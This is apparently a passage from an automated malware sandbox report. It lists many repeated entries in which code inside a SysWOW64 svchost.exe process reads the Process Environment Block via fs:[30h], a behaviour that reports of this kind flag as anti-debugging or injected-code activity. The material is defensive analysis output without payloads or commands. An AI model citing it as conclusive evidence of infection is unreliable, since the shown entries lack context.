Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h] 1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h] 1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h] 1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h] 1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h] 1_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h] 1_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h] 1_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h] 1_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h] 1_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h] 1_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h] 1_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h] 1_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033062D6 mov eax, dword ptr fs:[00000030h] 1_2_033062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03260124 mov eax, dword ptr fs:[00000030h] 1_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] 1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h] 1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] 1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] 1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h] 1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] 1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] 1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h] 1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] 1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h] 1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h] 1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h] 1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h] 1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h] 1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h] 1_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304164 mov eax, dword ptr fs:[00000030h] 1_2_03304164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304164 mov eax, dword ptr fs:[00000030h] 1_2_03304164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h] 1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h] 1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h] 1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h] 1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h] 1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h] 1_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h] 1_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03236154 mov eax, dword ptr fs:[00000030h] 1_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03236154 mov eax, dword ptr fs:[00000030h] 1_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03270185 mov eax, dword ptr fs:[00000030h] 1_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h] 1_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h] 1_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h] 1_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h] 1_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h] 1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h] 1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h] 1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h] 1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h] 1_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h] 1_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h] 1_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h] 1_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h] 1_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h] 1_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h] 1_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h] 1_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h] 1_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h] 1_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h] 1_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] 1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] 1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] 1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] 1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] 1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] 1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] 1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] 1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h] 1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h] 1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h] 1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h] 1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h] 1_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03232050 mov eax, dword ptr fs:[00000030h] 1_2_03232050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h] 1_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032280A0 mov eax, dword ptr fs:[00000030h] 1_2_032280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h] 1_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h] 1_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h] 1_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323208A mov eax, dword ptr fs:[00000030h] 1_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h] 1_2_0322A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h] 1_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h] 1_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h] 1_2_0322C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h] 1_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h] 1_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h] 1_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h] 1_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326273C mov eax, dword ptr fs:[00000030h] 1_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h] 1_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326273C mov eax, dword ptr fs:[00000030h] 1_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h] 1_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h] 1_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03230710 mov eax, dword ptr fs:[00000030h] 1_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03260710 mov eax, dword ptr fs:[00000030h] 1_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03238770 mov eax, dword ptr fs:[00000030h] 1_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h] 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326674D mov esi, dword ptr fs:[00000030h] 1_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326674D mov eax, dword ptr fs:[00000030h] 1_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326674D mov eax, dword ptr fs:[00000030h] 1_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03230750 mov eax, dword ptr fs:[00000030h] 1_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h] 1_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272750 mov eax, dword ptr fs:[00000030h] 1_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272750 mov eax, dword ptr fs:[00000030h] 1_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h] 1_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032307AF mov eax, dword ptr fs:[00000030h] 1_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h] 1_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D678E mov eax, dword ptr fs:[00000030h] 1_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032527ED mov eax, dword ptr fs:[00000030h] 1_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032527ED mov eax, dword ptr fs:[00000030h] 1_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032527ED mov eax, dword ptr fs:[00000030h] 1_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h] 1_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032347FB mov eax, dword ptr fs:[00000030h] 1_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032347FB mov eax, dword ptr fs:[00000030h] 1_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h] 1_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h] 1_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h] 1_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03266620 mov eax, dword ptr fs:[00000030h] 1_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03268620 mov eax, dword ptr fs:[00000030h] 1_2_03268620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323262C mov eax, dword ptr fs:[00000030h] 1_2_0323262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h] 1_2_032AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h] 1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h] 1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h] 1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h] 1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h] 1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h] 1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h] 1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272619 mov eax, dword ptr fs:[00000030h] 1_2_03272619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F866E mov eax, dword ptr fs:[00000030h] 1_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F866E mov eax, dword ptr fs:[00000030h] 1_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h] 1_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h] 1_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03262674 mov eax, dword ptr fs:[00000030h] 1_2_03262674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324C640 mov eax, dword ptr fs:[00000030h] 1_2_0324C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326C6A6 mov eax, dword ptr fs:[00000030h] 1_2_0326C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032666B0 mov eax, dword ptr fs:[00000030h] 1_2_032666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03234690 mov eax, dword ptr fs:[00000030h] 1_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03234690 mov eax, dword ptr fs:[00000030h] 1_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h] 1_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h] 1_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326A6C7 mov ebx, dword ptr fs:[00000030h] 1_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326A6C7 mov eax, dword ptr fs:[00000030h] 1_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h] 1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h] 1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h] 1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h] 1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h] 1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h] 1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h] 1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h] 1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h] 1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h] 1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h] 1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C6500 mov eax, dword ptr fs:[00000030h] 1_2_032C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h] 1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h] 1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h] 1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h] 1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h] 1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h] 1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h] 1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326656A mov eax, dword ptr fs:[00000030h] 1_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326656A mov eax, dword ptr fs:[00000030h] 1_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326656A mov eax, dword ptr fs:[00000030h] 1_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03238550 mov eax, dword ptr fs:[00000030h] 1_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03238550 mov eax, dword ptr fs:[00000030h] 1_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h] 1_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h] 1_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h] 1_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h] 1_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h] 1_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03232582 mov eax, dword ptr fs:[00000030h] 1_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03232582 mov ecx, dword ptr fs:[00000030h] 1_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03264588 mov eax, dword ptr fs:[00000030h] 1_2_03264588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E59C mov eax, dword ptr fs:[00000030h] 1_2_0326E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032325E0 mov eax, dword ptr fs:[00000030h] 1_2_032325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h] 1_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h] 1_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h] 1_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h] 1_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032365D0 mov eax, dword ptr fs:[00000030h] 1_2_032365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h] 1_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h] 1_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h] 1_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322C427 mov eax, dword ptr fs:[00000030h] 1_2_0322C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h] 1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h] 1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h] 1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h] 1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h] 1_2_032B6420
